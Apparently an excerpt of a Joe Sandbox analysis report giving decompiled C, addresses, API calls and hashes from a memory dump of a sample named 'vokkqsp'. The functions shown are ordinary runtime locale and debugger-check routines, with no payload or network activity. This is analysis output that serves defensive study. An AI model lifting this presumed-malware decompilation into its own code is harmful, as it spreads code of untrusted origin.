				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t52 = 0;
					return _t34;
				}
				return _t34;
			}



















                                                      0x004296d9
                                                      0x004296df
                                                      0x004296e0
                                                      0x004296e3
                                                      0x004296e6
                                                      0x004296e6
                                                      0x004296e9
                                                      0x004296eb
                                                      0x004296f9
                                                      0x004296ff
                                                      0x00429702
                                                      0x00429705
                                                      0x00429705
                                                      0x00429708
                                                      0x0042970a
                                                      0x00429713
                                                      0x0042971e
                                                      0x00429721
                                                      0x00429727
                                                      0x00429732
                                                      0x00429732
                                                      0x0042973b
                                                      0x0042973e
                                                      0x00429746
                                                      0x0042974c
                                                      0x00429750
                                                      0x00429755
                                                      0x00429759
                                                      0x0042975e
                                                      0x00429760
                                                      0x00000000
                                                      0x00429760
                                                      0x00429766

                                                      APIs
                                                        • Part of subcall function 0041FEAE: GetLastError.KERNEL32(?,00000008,0042383F), ref: 0041FEB2
                                                        • Part of subcall function 0041FEAE: SetLastError.KERNEL32(00000000), ref: 0041FF54
                                                      • EnumSystemLocalesW.KERNEL32(004297F2,00000001,00000000,?,-00000050,?,00429E23,00000000,?,?,?,00000055,?), ref: 0042973E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: 42ba90cc79ca8f9762757d0d852a5c0c2064d4310baa6aae04a7004011a52afb
                                                      • Instruction ID: 2f0d4e32f0deec5853a2c3e02f665f298c055208947e9c0dc0404009859066ce
                                                      • Opcode Fuzzy Hash: 42ba90cc79ca8f9762757d0d852a5c0c2064d4310baa6aae04a7004011a52afb
                                                      • Instruction Fuzzy Hash: A111023A2107019FDB289F3AA8916BAB791FF80318F55443EE98687B40E375AC42C744
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00423073 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 42%
                                                      			E00423073(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __esi;
				int _t8;
				signed int _t11;
				void* _t14;
				signed int _t17;
				void* _t19;
				signed int _t21;
				signed char _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t25;

				_t24 = __edi;
				_t23 = __ecx;
				_t8 = IsDebuggerPresent();
				_t25 = _a4;
				_t22 = _t21 & 0xffffff00 | _t8 != 0x00000000;
				if(_t8 == 0) {
					L5:
					__eflags = E00426300(_t23) - 2;
					if(__eflags != 0) {
						L11:
						_t11 = (_t22 & 0x000000ff) + 3;
						__eflags = _t11;
						return _t11;
					}
					__eflags = E0042AD88(__eflags);
					if(__eflags == 0) {
						goto L11;
					}
					__eflags = E0042AE78(_t22, _t24, _t25, __eflags);
					if(__eflags != 0) {
						_t14 = E0042ADFC(__eflags);
						_push(_a12);
						_push(_a8);
						_push(_t25);
						_push(_t14);
					} else {
						_t17 = _a12 | 0x00200000;
						__eflags = _t17;
						_push(_t17);
						_push(_a8);
						_push(_t25);
						_push(0);
					}
					return E0042AC40(_t22, _t24);
				}
				if(_t25 != 0) {
					E0042F750(_t22, _t25, _t25);
				}
				if(E00426375(_t23) == 1) {
					goto L5;
				} else {
					_t19 = 4;
					return _t19;
				}
			}















                                                      0x00423073
                                                      0x00423073
                                                      0x0042307a
                                                      0x00423080
                                                      0x00423085
                                                      0x0042308a
                                                      0x004230a5
                                                      0x004230aa
                                                      0x004230ad
                                                      0x004230e6
                                                      0x004230e9
                                                      0x004230e9
                                                      0x00000000
                                                      0x004230e9
                                                      0x004230b4
                                                      0x004230b6
                                                      0x00000000
                                                      0x00000000
                                                      0x004230bd
                                                      0x004230bf
                                                      0x004230d7
                                                      0x004230dc
                                                      0x004230df
                                                      0x004230e2
                                                      0x004230e3
                                                      0x004230c1
                                                      0x004230c4
                                                      0x004230c4
                                                      0x004230c9
                                                      0x004230ca
                                                      0x004230cd
                                                      0x004230ce
                                                      0x004230ce
                                                      0x00000000
                                                      0x004230d0
                                                      0x0042308e
                                                      0x00423091
                                                      0x00423091
                                                      0x0042309e
                                                      0x00000000
                                                      0x004230a0
                                                      0x004230a2
                                                      0x00000000
                                                      0x004230a2

                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 0042307A
                                                        • Part of subcall function 0042F750: OutputDebugStringW.KERNEL32(00000000,?,?,?,?), ref: 0042F7A6
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: DebugDebuggerOutputPresentString
                                                      • String ID:
                                                      • API String ID: 4086329628-0
                                                      • Opcode ID: 538f1d4e3164ede835804c03948c75c47ec9e2bbfc4900f9b0e8a9b63b137b60
                                                      • Instruction ID: c023f3785404f376ce8abbb3f71c47f836cedd075dd6bf109708c9de89dd5fdd
                                                      • Opcode Fuzzy Hash: 538f1d4e3164ede835804c03948c75c47ec9e2bbfc4900f9b0e8a9b63b137b60
                                                      • Instruction Fuzzy Hash: 20F0D631304239B79E216E927C01B6F3769EF017A6F944407FD44C6205CA2EDA11D17E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00429C74 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E00429C74(signed int _a4, intOrPtr _a8) {
				short _v8;
				void* __ecx;
				void* __esi;
				void* __ebp;
				void* _t8;
				void* _t11;
				intOrPtr _t13;
				void* _t15;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t25;
				signed int _t26;
				intOrPtr* _t28;

				_push(_t15);
				_push(_t25);
				_t8 = E0041FEAE(_t15, _t21, _t25);
				_t26 = _a4;
				_t23 = _t8;
				if(GetLocaleInfoW(_t26 & 0x000003ff | 0x00000400, 0x20000001,  &_v8, 2) == 0) {
					L7:
					_t11 = 0;
				} else {
					if(_t26 == _v8 || _a8 == 0) {
						L6:
						_t11 = 1;
					} else {
						_t28 =  *((intOrPtr*)(_t23 + 0x50));
						_t19 = _t28 + 2;
						do {
							_t13 =  *_t28;
							_t28 = _t28 + 2;
						} while (_t13 != 0);
						if(E004297C6( *((intOrPtr*)(_t23 + 0x50))) == _t28 - _t19 >> 1) {
							goto L7;
						} else {
							goto L6;
						}
					}
				}
				return _t11;
			}

















                                                      0x00429c79
                                                      0x00429c7a
                                                      0x00429c7c
                                                      0x00429c81
                                                      0x00429c84
                                                      0x00429ca8
                                                      0x00429cdc
                                                      0x00429cdc
                                                      0x00429caa
                                                      0x00429cad
                                                      0x00429cd7
                                                      0x00429cd9
                                                      0x00429cb5
                                                      0x00429cb5
                                                      0x00429cb8
                                                      0x00429cbb
                                                      0x00429cbb
                                                      0x00429cbe
                                                      0x00429cc1
                                                      0x00429cd5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00429cd5
                                                      0x00429cad
                                                      0x00429ce1

                                                      APIs
                                                        • Part of subcall function 0041FEAE: GetLastError.KERNEL32(?,00000008,0042383F), ref: 0041FEB2
                                                        • Part of subcall function 0041FEAE: SetLastError.KERNEL32(00000000), ref: 0041FF54
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00429A0E,00000000,00000000,?), ref: 00429CA0
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID:
                                                      • API String ID: 3736152602-0
                                                      • Opcode ID: 8e433b52b9e2037682d43a49f572d333b2c1c0f79dd140f7a2d5da38e1e1b0a1
                                                      • Instruction ID: 580bf14ed2058662729e5f4cb0d1a22b602310677bd2c0613c68ed8da2b0c927
                                                      • Opcode Fuzzy Hash: 8e433b52b9e2037682d43a49f572d333b2c1c0f79dd140f7a2d5da38e1e1b0a1
                                                      • Instruction Fuzzy Hash: F4F0F932710125ABDB245B22DC45BBB7798DB40754F59043AED05E3240EB38FD41D6A8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00429767 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00429767(void* __ecx, void* __edx, signed char* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t11;
				signed char* _t15;
				intOrPtr* _t19;
				intOrPtr _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = E0041FEAE(__ecx, __edx, _t26);
				_t24 = 2;
				_t19 =  *((intOrPtr*)(_t27 + 0x50));
				_t25 = _t19 + 2;
				do {
					_t11 =  *_t19;
					_t19 = _t19 + _t24;
				} while (_t11 != 0);
				_t4 = _t19 - _t25 >> 1 == 3;
				 *(_t27 + 0x60) = 0 | _t4;
				if(_t4 != 0) {
					_t24 = E004297C6( *((intOrPtr*)(_t27 + 0x50)));
				}
				 *((intOrPtr*)(_t27 + 0x5c)) = _t24;
				EnumSystemLocalesW(E00429A45, 1);
				_t15 = _a4;
				if(( *_t15 & 0x00000004) == 0) {
					 *_t15 = 0;
					return _t15;
				}
				return _t15;
			}












                                                      0x00429774
                                                      0x0042977a
                                                      0x0042977b
                                                      0x0042977e
                                                      0x00429781
                                                      0x00429781
                                                      0x00429784
                                                      0x00429786
                                                      0x00429794
                                                      0x00429797
                                                      0x0042979a
                                                      0x004297a5
                                                      0x004297a5
                                                      0x004297ae
                                                      0x004297b1
                                                      0x004297b7
                                                      0x004297bd
                                                      0x004297bf
                                                      0x00000000
                                                      0x004297bf
                                                      0x004297c5

                                                      APIs
                                                        • Part of subcall function 0041FEAE: GetLastError.KERNEL32(?,00000008,0042383F), ref: 0041FEB2
                                                        • Part of subcall function 0041FEAE: SetLastError.KERNEL32(00000000), ref: 0041FF54
                                                      • EnumSystemLocalesW.KERNEL32(00429A45,00000001,00000000,?,-00000050,?,00429DE7,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004297B1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: 91143fa296edbb484ea92f160725dff0b1cb7b7a33454bb7959f1cc2888faa45
                                                      • Instruction ID: 2330239866fa6033ed44c31cba710f9e22817a6dbbf883f410c869d6bb066d8a
                                                      • Opcode Fuzzy Hash: 91143fa296edbb484ea92f160725dff0b1cb7b7a33454bb7959f1cc2888faa45
                                                      • Instruction Fuzzy Hash: 2EF046363103049FDB245F36EC81A7A7B90FFC0728F14843EF9058B680C6759C02C614
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00429F45 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00429F45(void* __edx, void* __eflags) {
				intOrPtr _t17;
				signed int _t27;
				void* _t29;

				E00403400(__edx, 0x448810, 0xc);
				 *(_t29 - 0x1c) =  *(_t29 - 0x1c) & 0x00000000;
				E004260B0( *((intOrPtr*)( *((intOrPtr*)(_t29 + 8)))));
				 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
				 *0x44ce68 = E004101F4( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t29 + 0xc)))))));
				_t27 = EnumSystemLocalesW(E00429F38, 1);
				_t17 =  *0x44b018; // 0x1989d38f
				 *0x44ce68 = _t17;
				 *(_t29 - 0x1c) = _t27;
				 *(_t29 - 4) = 0xfffffffe;
				E00429FB5();
				 *[fs:0x0] =  *((intOrPtr*)(_t29 - 0x10));
				return _t27;
			}






                                                      0x00429f4c
                                                      0x00429f51
                                                      0x00429f5a
                                                      0x00429f60
                                                      0x00429f71
                                                      0x00429f83
                                                      0x00429f85
                                                      0x00429f8a
                                                      0x00429f8f
                                                      0x00429f92
                                                      0x00429f99
                                                      0x00429fa3
                                                      0x00429faf

                                                      APIs
                                                        • Part of subcall function 004260B0: EnterCriticalSection.KERNEL32(?,?,00423425,?,00448730,0000000C), ref: 004260BF
                                                      • EnumSystemLocalesW.KERNEL32(00429F38,00000001,00448810,0000000C,0042A7F3,00000000), ref: 00429F7D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: ed0437103b830169e83f6cac114c24104203890702e9d768c521767dc1f1bf38
                                                      • Instruction ID: d7619c074703ab2d286ef77e5e4cfb7b639bea3a8d004e835a548f7aa371deed
                                                      • Opcode Fuzzy Hash: ed0437103b830169e83f6cac114c24104203890702e9d768c521767dc1f1bf38
                                                      • Instruction Fuzzy Hash: F0F03C76B50210DFD710EF58E842B9D77B0EB05725F20402BF410DB290CBB94944CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00429663 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00429663(void* __ecx, void* __edx, signed char* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				intOrPtr* _t15;
				void* _t19;
				void* _t21;
				void* _t22;

				_t19 = E0041FEAE(__ecx, __edx, _t21);
				_t15 =  *((intOrPtr*)(_t19 + 0x54));
				_t22 = _t15 + 2;
				do {
					_t9 =  *_t15;
					_t15 = _t15 + 2;
				} while (_t9 != 0);
				 *(_t19 + 0x64) = 0 | _t15 - _t22 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x4295bc, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}











                                                      0x0042966f
                                                      0x00429673
                                                      0x00429676
                                                      0x00429679
                                                      0x00429679
                                                      0x0042967c
                                                      0x0042967f
                                                      0x00429697
                                                      0x0042969a
                                                      0x004296a0
                                                      0x004296a6
                                                      0x004296a8
                                                      0x00000000
                                                      0x004296a8
                                                      0x004296ad

                                                      APIs
                                                        • Part of subcall function 0041FEAE: GetLastError.KERNEL32(?,00000008,0042383F), ref: 0041FEB2
                                                        • Part of subcall function 0041FEAE: SetLastError.KERNEL32(00000000), ref: 0041FF54
                                                      • EnumSystemLocalesW.KERNEL32(004295BC,00000001,00000000,?,?,00429E45,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0042969A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: 1235dbf670d65062be7499a9188d99711eb98f6045fa356f31d4ccda42ae8008
                                                      • Instruction ID: 5c32e0a841fa3f9a212884b52167dc3a9d1cee235a2d9c193e991ddd58216430
                                                      • Opcode Fuzzy Hash: 1235dbf670d65062be7499a9188d99711eb98f6045fa356f31d4ccda42ae8008
                                                      • Instruction Fuzzy Hash: 7EF05C3A30020457CB149F35E815B667F90EFC1710F46405EEA058B251C2369C43C758
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0042A982 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0040FC1D,?,20001004,00000000,00000002,?,?,0040EF9B), ref: 0042A9B6
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID:
                                                      • API String ID: 2299586839-0
                                                      • Opcode ID: cc1b5495f781d497285caa0df6d3bbbb2de9984f4a1e87bb0825f647b88a4161
                                                      • Instruction ID: 1b28cc3f7c7251639e79f85c74d617d8eef19725c327b06c0ff05472a83ca0af
                                                      • Opcode Fuzzy Hash: cc1b5495f781d497285caa0df6d3bbbb2de9984f4a1e87bb0825f647b88a4161
                                                      • Instruction Fuzzy Hash: DAE04F75640128BBCF126F62FC05F9E3E16EF44B60F414426FE0965221CB369D71EA9E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0042A05B Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0042A05B(intOrPtr _a4) {
				int _t3;
				intOrPtr _t5;

				 *0x44ce68 = E004101F4(_a4);
				_t3 = EnumSystemLocalesW(E00429F38, 1);
				_t5 =  *0x44b018; // 0x1989d38f
				 *0x44ce68 = _t5;
				return _t3;
			}





                                                      0x0042a070
                                                      0x0042a075
                                                      0x0042a07b
                                                      0x0042a081
                                                      0x0042a088

                                                      APIs
                                                      • EnumSystemLocalesW.KERNEL32(Function_00029F38,00000001), ref: 0042A075
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2099609381-0
                                                      • Opcode ID: caa8a21da75d651a8e6f144d49ea41cff4d52b55df256a3598d6917753e336cf
                                                      • Instruction ID: 0d9a8804212323a1195b0d3c756ccea5a120ffeec1fe52071b3def297397aa12
                                                      • Opcode Fuzzy Hash: caa8a21da75d651a8e6f144d49ea41cff4d52b55df256a3598d6917753e336cf
                                                      • Instruction Fuzzy Hash: DED0A77A650304ABD7245F11FC869443B25E342710FA8003AF408473A0DFFA58C5C74C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0042A032 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0042A032(intOrPtr* __ecx) {
				int _t3;
				intOrPtr _t6;

				 *0x44ce68 = E004101F4( *((intOrPtr*)( *__ecx)));
				_t3 = EnumSystemLocalesW(E00429F38, 1);
				_t6 =  *0x44b018; // 0x1989d38f
				 *0x44ce68 = _t6;
				return _t3;
			}





                                                      0x0042a043
                                                      0x0042a048
                                                      0x0042a04e
                                                      0x0042a054
                                                      0x0042a05a

                                                      APIs
                                                      • EnumSystemLocalesW.KERNEL32(Function_00029F38,00000001), ref: 0042A048
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2099609381-0
                                                      • Opcode ID: 811a786cc05274437d644bf7befed4402a384bb7bf91c27eb48945fc61f482b9
                                                      • Instruction ID: 404cac7c7ac09b26225a730336fa01e1ccfccda416681151766969cb72b87642
                                                      • Opcode Fuzzy Hash: 811a786cc05274437d644bf7befed4402a384bb7bf91c27eb48945fc61f482b9
                                                      • Instruction Fuzzy Hash: 69D0C9B96613009FD7649F20E885A443761E706701BB8007AB4018B2B0DBBA5899DB08
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00426375 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 81%
                                                      			E00426375(void* __ecx) {
				char _v8;
				intOrPtr _t9;
				void* _t11;
				void* _t13;
				char _t21;

				_t21 =  *0x44cd84; // 0x0
				if(_t21 == 0) {
					_t21 = 2;
					_v8 = _t21;
					_t9 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t25 =  *((intOrPtr*)(_t9 + 8));
					if( *((intOrPtr*)(_t9 + 8)) >= 0) {
						E0042A6E8(_t25,  &_v8);
					}
					_t11 = _v8 - 1;
					if(_t11 != 0) {
						_t13 = _t11 - 1;
						if(_t13 == 0) {
							_t21 = 1;
							__eflags = 1;
						} else {
							if(_t13 == 1) {
								_push(3);
							} else {
								_push(4);
							}
							_pop(_t21);
						}
					}
					 *0x44cd84 = _t21;
				}
				return _t21;
			}








                                                      0x0042637c
                                                      0x00426385
                                                      0x0042638f
                                                      0x00426390
                                                      0x00426393
                                                      0x00426396
                                                      0x0042639a
                                                      0x004263a0
                                                      0x004263a0
                                                      0x004263a8
                                                      0x004263ab
                                                      0x004263ad
                                                      0x004263b0
                                                      0x004263c2
                                                      0x004263c2
                                                      0x004263b2
                                                      0x004263b5
                                                      0x004263bb
                                                      0x004263b7
                                                      0x004263b7
                                                      0x004263b7
                                                      0x004263bd
                                                      0x004263bd
                                                      0x004263b0
                                                      0x004263ca
                                                      0x004263ca
                                                      0x004263d0

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cdf4e24bd950f6d5e768c3ec5f7999a524d3141b83088ef1521dbde27be504a3
                                                      • Instruction ID: 1349cce661bcd7ec6fb54b9ffe0d9d47e8d568316f9f493824e7e31e020cb029
                                                      • Opcode Fuzzy Hash: cdf4e24bd950f6d5e768c3ec5f7999a524d3141b83088ef1521dbde27be504a3
                                                      • Instruction Fuzzy Hash: E8F06D72740230ABD716DA5CAA19F9976ACEB05B10F961057F901EB390C6B9DE00C7DC
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004261AC Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E004261AC(void* __ecx, char _a4) {
				char _v8;
				intOrPtr _t8;
				intOrPtr _t11;
				void* _t13;
				void* _t15;

				_t8 =  *0x44cd84; // 0x0
				if(_t8 != 0) {
					return _t8;
				}
				_v8 = _a4;
				_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t25 =  *((intOrPtr*)(_t11 + 8));
				if( *((intOrPtr*)(_t11 + 8)) >= 0) {
					E0042A6E8(_t25,  &_v8);
				}
				_t13 = _v8 - 1;
				if(_t13 == 0) {
					_push(2);
					goto L10;
				} else {
					_t15 = _t13 - 1;
					if(_t15 == 0) {
						L11:
						 *0x44cd84 = 1;
						return 1;
					}
					if(_t15 == 1) {
						_push(3);
					} else {
						_push(4);
					}
					L10:
					_pop(1);
					goto L11;
				}
			}








                                                      0x004261b2
                                                      0x004261ba
                                                      0x00426206
                                                      0x00426206
                                                      0x004261bf
                                                      0x004261c8
                                                      0x004261cb
                                                      0x004261cf
                                                      0x004261d5
                                                      0x004261d5
                                                      0x004261dd
                                                      0x004261e0
                                                      0x004261f9
                                                      0x00000000
                                                      0x004261e2
                                                      0x004261e2
                                                      0x004261e5
                                                      0x004261fc
                                                      0x00426203
                                                      0x00000000
                                                      0x00426203
                                                      0x004261ea
                                                      0x004261f0
                                                      0x004261ec
                                                      0x004261ec
                                                      0x004261ec
                                                      0x004261fb
                                                      0x004261fb
                                                      0x00000000
                                                      0x004261fb

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
